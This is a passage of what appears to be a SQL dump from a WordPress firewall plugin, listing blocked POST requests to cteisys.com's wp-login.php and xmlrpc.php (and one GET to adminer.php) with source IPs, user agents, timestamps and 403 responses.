Safari\\/537.36\"}','3fLmo1RKEcSDTBW6VdHrxP0h',0,1665340528.3703,18065,'','POST',403,0,600,0,1,'',0),('121.243.95.160',2045992864,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','Hcp8VJhiUMTWxgAGouQF9zKY',0,1665339943.6604,17166,'','POST',403,0,600,0,1,'',0),('138.68.180.230',2319758566,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','hCZNcnKkBTGDqHIoVg50Oat3',0,1665339510.1183,9688,'','POST',403,0,600,0,1,'',0),('207.46.234.202',3475958474,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','UPXhWg8spKFAnqwBtYaf23ir',0,1665338913.7001,5189,'','POST',403,0,600,0,1,'',0),('150.109.148.216',2523763928,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.193 Safari\\/537.36\"}','QGHN8mv1WJERFfYizOXutdck',0,1665338471.9651,1242,'','POST',403,0,600,0,1,'',0),('69.163.196.200',1168360648,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.87 Safari\\/537.36\"}','sFUBS8tcvmfAh67lGxkW1LOn',0,1665345505.2191,17425,'','POST',403,0,600,0,1,'',0),('208.113.180.18',3497112594,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.122 Safari\\/537.36\"}','IZx7NhOeHMvwrXEzyuSq6tTg',0,1665345933.7957,1286,'','POST',403,0,600,0,1,'',0),('45.162.228.171',765650091,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','LzYNUv0s1Jn43eFh5PCROTmQ',0,1665345106.5070,11163,'','POST',403,0,515,0,1,'',0),('23.99.229.218',392422874,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','Vd0TM4HU9LPJF1o3wYzGBt5s',0,1665344930.5085,17668,'','POST',403,0,600,0,1,'',0),('202.29.236.140',3390958732,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.86 Safari\\/537.36\"}','t59MJcjkPwh6NHXfRUombK3T',0,1665344508.4765,17587,'','POST',403,0,600,0,1,'',0),('167.71.234.124',2806508156,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','FB6duE5Vj8C3sOMZQIhq9gpX',0,1665343935.4501,17275,'','POST',403,0,600,0,1,'',0),('198.98.48.183',3328323767,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/42.0.2311.90 Safari\\/537.36\",\"2\":\"http:\\/\\/www.google.com.hk\"}','Hb5J8Rq0tPVj6iogN3phdSaL',0,1665343688.3767,18488,'','POST',403,0,515,0,1,'',0),('47.110.72.238',795756782,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','pLSx5rdl9I6M7jhWFPtusJT1',0,1665343515.5858,17412,'','POST',403,0,600,0,1,'',0),('64.225.65.31',1088504095,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.167 Safari\\/537.36\"}','mG4YXvtFagNSCO8T3x1bopuB',0,1665342943.8297,17690,'','POST',403,0,600,0,1,'',0),('104.131.68.19',1753433107,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.122 Safari\\/537.36\"}','vWeaGBhp0P7yrqIbVwNf32Qj',0,1665348975.7944,11780,'','POST',403,0,600,0,1,'',0),('77.65.213.168',1296160168,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2785.143 Safari\\/537.36\"}','hdvOM7J6TsLyNl9HX4bFP5ZW',0,1665348546.2716,9296,'','POST',403,0,600,0,1,'',0),('188.166.225.235',3165053419,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','6PZQ1dv9n5q3RyGmfNhpDFWA',0,1665347962.9964,18076,'','POST',403,0,600,0,1,'',0),('68.183.71.174',1152862126,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\"}','4IuHmhlsV5Zp1GJXwPfvRCQy',0,1665347532.8223,17753,'','POST',403,0,600,0,1,'',0),('207.46.234.202',3475958474,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','A84o9DuUKgTcLNqdlCZa6kbM',0,1665346947.9239,8307,'','POST',403,0,600,0,1,'',0),('142.93.203.156',2388511644,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2840.99 Safari\\/537.36\"}','Shl9RwYypTo6Pqc5V2XZ3Hbu',0,1665346515.1076,17699,'','POST',403,0,600,0,1,'',0),('34.68.76.32',574901280,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','w8FWCIyiZmTgGHYj4NKDcaAv',0,1665352598.1593,17351,'','POST',403,0,600,0,1,'',0),('185.2.4.134',3103917190,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36\"}','EoqDdpB9lxnKLUkuGrmveCws',0,1665352016.7219,1565,'','POST',403,0,600,0,1,'',0),('101.99.95.162',1701011362,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Lu1o6b902xHydejp5IC7zhrm',0,1665351867.7665,18528,'','POST',403,0,515,0,1,'',0),('13.79.17.158',223285662,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.122 Safari\\/537.36\"}','uAiCEaQelh2v5TSnJyZKWUDm',0,1665351590.6066,6510,'','POST',403,0,600,0,1,'',0),('51.210.53.165',869414309,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','2sN639YPGcfihkTt8gnzvaI4',0,1665351353.8079,2212,'','POST',403,0,515,0,1,'',0),('145.239.30.120',2448367224,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','aLzK6Xq0CRmYhVMP1soD3UnG',0,1665351008.3316,12904,'','POST',403,0,600,0,1,'',0),('103.154.177.165',1738191269,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Xus1cWIJab8FtlyHZjCMrAne',0,1665350870.7757,2927,'','POST',403,0,515,0,1,'',0),('136.243.19.225',2297631713,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/58.0.3029.110 Safari\\/537.36\"}','USv2Zb97YKWdXrGaAy6LmVf5',0,1665350576.0375,1756,'','POST',403,0,600,0,1,'',0),('202.21.38.119',3390383735,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.75 Safari\\/537.36\"}','5HAKQBJai4lYrCop0nyIEhb6',0,1665349992.2663,17144,'','POST',403,0,600,0,1,'',0),('77.65.212.122',1296159866,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','ctypvuqeJ3P4U1S59KBnXbAZ',0,1665349562.4119,17530,'','POST',403,0,600,0,1,'',0),('185.49.20.77',3107001421,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','pyMH3jRLqSdkogZerT2ibXQn',0,1665356330.7648,1263,'','POST',403,0,515,0,1,'',0),('146.70.115.219',2454090715,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','My9b5E4wjHOvRFaeLzdNro7q',0,1665356281.4213,19437,'','POST',403,0,515,0,1,'',0),('195.178.120.27',3283253275,'','https://cteisys.com//xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/95.0.4638.69 Safari\\/537.36\"}','aEmLDb73AMiQ4x9sjzVnkpNf',0,1665356085.2889,1513,'','POST',403,0,515,0,1,'',0),('119.237.81.29',2012041501,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/49.0.2623.112 Safari\\/537.36\"}','VHKf9a2LZTbv5IjEe6GwqXsl',0,1665356074.0521,4647,'','POST',403,0,600,0,1,'',0),('103.221.220.140',1742593164,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','sLKwyfmRzajA2k6Y3i4IcWG5',0,1665355752.1513,19404,'','POST',403,0,515,0,1,'',0),('1.117.250.215',24509143,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\"}','i7tPS18MhTEwuJv9ZsHBWk4G',0,1665355057.0713,17237,'','POST',403,0,600,0,1,'',0),('13.78.225.32',223273248,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','SH2Gvli0ahmNdryR4OnfkP3W',0,1665354629.9650,480,'','POST',403,0,600,0,1,'',0),('184.168.121.5',3098048773,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','2tUn8ZHoJOXFNg9vsrumcM1z',0,1665354594.4443,18553,'','POST',403,0,515,0,1,'',0),('198.12.254.32',3322740256,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Y83eZLVEOxqn4XfghPb2kABK',0,1665354038.2033,17709,'','POST',403,0,515,0,1,'',0),('103.130.218.189',1736628925,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','kgAs8Zvt20SdbeCHUD9ifaXx',0,1665354043.2605,12639,'','POST',403,0,600,0,1,'',0),('94.231.86.20',1592219156,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/77.0.3865.90 Safari\\/537.36\"}','bEHxk2uMmvrsw4lTUqX03JSA',0,1665353610.0194,594,'','POST',403,0,600,0,1,'',0),('103.90.232.106',1734010986,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','9NIz5BTWKV6vMRnUZ8SHPuoX',0,1665353467.0303,18688,'','POST',403,0,515,0,1,'',0),('146.148.44.185',2459184313,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','gfyv9inEZ7ONbVRFqKWTDSIC',0,1665353028.3412,1258,'','POST',403,0,600,0,1,'',0),('103.146.202.150',1737673366,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','bRwX7FDtiJTrjnYlmeCovscE',0,1665352914.9123,19048,'','POST',403,0,515,0,1,'',0),('90.156.169.12',1520216332,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','TvMwxpkFf74ugyXVh8OZlm3n',0,1665359860.1107,1232,'','POST',403,0,515,0,1,'',0),('208.113.153.235',3497105899,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','2soV61Oi4DFuTJCbyzBLapEA',0,1665359708.7163,13759,'','POST',403,0,600,0,1,'',0),('147.135.255.8',2475163400,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','GrendphzIcsZko1A0T6KmYCy',0,1665359122.2949,2553,'','POST',403,0,600,0,1,'',0),('80.77.135.125',1347258237,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Xp81Lvr7fS5ZyMRmgbkQNa3x',0,1665359237.4396,1159,'','POST',403,0,515,0,1,'',0),('45.83.220.178',760470706,'','http://cteisys.com/adminer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.116 Safari\\/537.36\"}','EMHQhnDP2aTFZyrCsxuUN0Yk',0,1665358877.4384,324,'','GET',403,0,700,0,1,'',0),('142.93.41.19',2388470035,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/52.0.2743.116 Safari\\/537.36\"}','Odx5UYSysp0ViuC4IzaEeX87',0,1665358693.7446,1217,'','POST',403,0,600,0,1,'',0),('87.106.229.31',1466623263,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Br6R5mlDQitJKyWvg7LT3E8p',0,1665358658.4913,19476,'','POST',403,0,515,0,1,'',0),('47.111.116.44',795833388,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\"}','ASiT6nOdkJ7Rep9K5XWwhUvD',0,1665358105.7215,557,'','POST',403,0,600,0,1,'',0),('185.183.122.143',3115809423,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','PENlFrUQ6S3kmsaJhcuCMA8L',0,1665358076.9338,505,'','POST',403,0,515,0,1,'',0),('205.185.116.156',3451483292,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/42.0.2311.90 Safari\\/537.36\",\"2\":\"http:\\/\\/www.google.com.hk\"}','kuUjYH5tXdrR7nIiqLCleZpm',0,1665358035.7223,18617,'','POST',403,0,515,0,1,'',0),('34.170.36.88',581575768,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.101 Safari\\/537.36\"}','ZN8fjsDbSnMvPm26h7OgAoqu',0,1665357680.1376,1357,'','POST',403,0,600,0,1,'',0),('199.188.207.230',3351039974,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','VcwdgOFUa5PuD6vXtmeHYb73',0,1665357480.8653,18931,'','POST',403,0,515,0,1,'',0),('148.72.214.194',2487801538,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','Fo3lGsdZYfm6HD14KEWvIS9R',0,1665357089.3243,17937,'','POST',403,0,600,0,1,'',0),('161.35.126.102',2703457894,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','iXSWnTLR80qNJx14Orw7v2Gc',0,1665356653.3933,17631,'','POST',403,0,600,0,1,'',0),('123.56.59.9',2067282697,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','qXBfmyzZN0eduvL2Qc7hTYiV',0,1665363444.9698,1727,'','POST',403,0,515,0,1,'',0),('207.154.248.39',3483039783,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36\"}','PmkZBpgEd4JSLvVuDx2bQlMG',0,1665363227.7135,1499,'','POST',403,0,600,0,1,'',0),('109.233.192.83',1844035667,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','lC7O6FqnhMxwWJvobAzt3I8j',0,1665362829.2292,1250,'','POST',403,0,515,0,1,'',0),('149.248.59.66',2516073282,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','7eGFdTRVBgWx4hfjDMOcNA98',0,1665362198.4097,17664,'','POST',403,0,600,0,1,'',0),('67.205.62.27',1137524251,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','4YqVhOB0Em1JnDb386csp5ar',0,1665362789.0340,1782,'','POST',403,0,600,0,1,'',0),('128.199.109.135',2160553351,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','jbolBJEYm8MraUdiPzZ79vWQ',0,1665362210.1631,5878,'','POST',403,0,515,0,1,'',0),('95.217.129.44',1608089900,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','bMnUvHSxqs6mgPtKpORfJXyu',0,1665361762.4458,1186,'','POST',403,0,600,0,1,'',0),('95.217.147.17',1608094481,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','tDkiMKRdw43hEQ59froj6pgs',0,1665361622.5663,10839,'','POST',403,0,515,0,1,'',0),('46.32.228.70',773907526,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.193 Safari\\/537.36\"}','0r2oiE6QPtWCMRfcqwj9K8kH',0,1665361175.1363,17324,'','POST',403,0,600,0,1,'',0),('13.78.225.32',223273248,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','goUzWy2fMXtqnxr1KZOSHT5s',0,1665360740.6466,11358,'','POST',403,0,600,0,1,'',0),('150.230.247.143',2531719055,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','L0YlpN9ZD3HbyfxUszhTIwOq',0,1665360440.3305,18684,'','POST',403,0,515,0,1,'',0),('136.243.19.225',2297631713,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.89 Safari\\/537.36\"}','r9Nc04LQMdJ6Fn3IblEOgs5a',0,1665360149.5881,13481,'','POST',403,0,600,0,1,'',0),('72.34.62.119',1210203767,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','pOUT8x1JvGbKNYhz9QXBEru7',0,1665366551.3223,18231,'','POST',403,0,515,0,1,'',0),('51.255.81.60',872370492,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','HKfJtFpmWzh6RvMcLgU3COuA',0,1665366912.4474,18086,'','POST',403,0,600,0,1,'',0),('131.72.236.73',2202594377,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','GQpx30s7SLkachUwF4WbToM2',0,1665367192.1629,19344,'','POST',403,0,515,0,1,'',0),('138.68.147.16',2319749904,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','hSb6arDABx4v5PlmCXuGYF2N',0,1665366319.9843,17755,'','POST',403,0,600,0,1,'',0),('13.237.121.70',233666886,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','OTsX1eHGjF3NvZ5B7JmEnpcu',0,1665365918.2527,1693,'','POST',403,0,515,0,1,'',0),('188.165.198.224',3164980960,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/52.0.2743.116 Safari\\/537.36\"}','vWl7G0byXLHsRQ2FSz8DZYPt',0,1665365882.6944,20175,'','POST',403,0,600,0,1,'',0),('138.68.180.230',2319758566,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','GUOJqLa4NKB6HXbQ30d8xhwR',0,1665365292.1246,17312,'','POST',403,0,600,0,1,'',0),('185.2.4.134',3103917190,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','b4e0fagk5i6tCOqjxdWXspwc',0,1665364853.6123,17404,'','POST',403,0,600,0,1,'',0),('167.71.111.16',2806476560,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','CuqOT7iQSa23NjlV5G8FnMm4',0,1665364690.4346,19555,'','POST',403,0,515,0,1,'',0),('146.148.44.185',2459184313,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.116 Safari\\/537.36\"}','acS2wkihsXjM3xWL764BNUr1',0,1665364259.1944,1860,'','POST',403,0,600,0,1,'',0),('184.75.223.211',3091980243,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','0xOmvEK3nRz7aGJ2Fpuw6dgX',0,1665364210.2547,19944,'','POST',403,0,515,0,1,'',0),('103.145.50.127',1737568895,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','mKVyQRqWY1nrNbzTc7k9hsaB',0,1665364061.8513,18605,'','POST',403,0,515,0,1,'',0),('51.255.81.60',872370492,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','YJxkX2f7tyVeRGuFPBKQo1L0',0,1665363819.0843,17721,'','POST',403,0,600,0,1,'',0),('185.252.31.59',3120308027,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','RKOJvUmCxdnB4WiMXwY9rlL2',0,1665368473.4903,19992,'','POST',403,0,515,0,1,'',0),('103.130.218.178',1736628914,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36\"}','8FwioD5aIQhV3MzlE2SG6kgc',0,1665367946.6216,17192,'','POST',403,0,600,0,1,'',0),('31.210.66.35',533873187,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','qFM19kSVWyPpLQahlm5H4ADJ',0,1665367825.8667,19814,'','POST',403,0,515,0,1,'',0),('123.25.21.16',2065241360,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) 